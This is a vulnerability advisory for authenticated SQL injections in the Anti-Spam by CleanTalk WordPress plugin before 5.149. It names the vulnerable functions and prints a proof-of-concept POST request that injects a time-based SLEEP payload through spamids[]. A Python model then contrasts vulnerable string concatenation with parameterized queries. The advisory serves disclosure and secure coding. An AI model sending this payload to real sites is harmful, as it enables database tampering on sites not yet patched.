wpexploit | Nguyen Anh Tien | WPEX-ID:1BC28021-28C0-43FA-B89E-6B93C345E5D8
Nov 20, 2020 - 12:00 a.m.

Anti-Spam by CleanTalk < 5.149 - Multiple Authenticated SQL Injections

EPSS: 0.001 (Low), percentile 36.6%

Multiple authenticated SQL injections exist in the Anti-Spam by CleanTalk plugin 5.148; however, exploiting them requires a high-privilege user (admin+).

Vulnerable functions: `removeLogs` and `removeSpam` in `lib/Cleantalk/ApbctWP/FindSpam/ListTable/Users.php`

Sleep query:

```
POST /wp-admin/users.php?page=ct_check_users&ct_worked=1 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 162

_wpnonce=2a613d258a&_wp_http_referer=%2Fwp-admin%2Fusers.php%3Fpage%3Dct_check_users%26ct_worked%3D1&action=-1&paged=1&spamids%5B%5D=30)+OR+SLEEP(1&action2=delete
```
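A model of why the `spamids[]` value in the request above alters the query, next to a hardened form, as an added example that is not the plugin's code (the plugin is PHP). It assumes the ids are joined unquoted into an `IN (...)` list, uses a constructed SQLite table `spam_users`, and registers a stub `SLEEP` function because SQLite has none; all function names are hypothetical.

```python
import sqlite3

# Decoded spamids[] value from the request on this page.
PAGE_PAYLOAD = "30) OR SLEEP(1"


def make_db():
    """Constructed in-memory table standing in for the plugin's data."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE spam_users (id INTEGER PRIMARY KEY)")
    db.executemany("INSERT INTO spam_users VALUES (?)", [(29,), (30,), (31,)])
    calls = []
    # SQLite has no SLEEP(); this stub records each call and returns 0.
    db.create_function("SLEEP", 1, lambda n: calls.append(n) or 0)
    return db, calls


def remove_spam_vulnerable(db, spam_ids):
    # Assumed pattern: request values concatenated straight into IN (...).
    sql = "DELETE FROM spam_users WHERE id IN (" + ",".join(spam_ids) + ")"
    return db.execute(sql).rowcount


def remove_spam_hardened(db, spam_ids):
    # Reject anything that is not a plain decimal id before building SQL.
    if not all(s.isascii() and s.isdigit() for s in spam_ids):
        raise ValueError("spamids[] must contain only integer ids")
    if not spam_ids:
        return 0
    # One placeholder per id; the values are bound, never concatenated.
    marks = ",".join("?" * len(spam_ids))
    sql = f"DELETE FROM spam_users WHERE id IN ({marks})"
    return db.execute(sql, [int(s) for s in spam_ids]).rowcount


if __name__ == "__main__":
    db, calls = make_db()
    deleted = remove_spam_vulnerable(db, [PAGE_PAYLOAD])
    print("vulnerable: rows deleted =", deleted, "SLEEP calls =", len(calls))

    db, calls = make_db()
    try:
        remove_spam_hardened(db, [PAGE_PAYLOAD])
    except ValueError as exc:
        print("hardened: rejected,", exc, "SLEEP calls =", len(calls))
    print("hardened: rows deleted =", remove_spam_hardened(db, ["30", "31"]))
```

In the vulnerable path the closing parenthesis in the value ends the `IN (...)` list early, so the database evaluates `SLEEP` as part of the `WHERE` clause; in the hardened path the value never reaches the SQL text.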
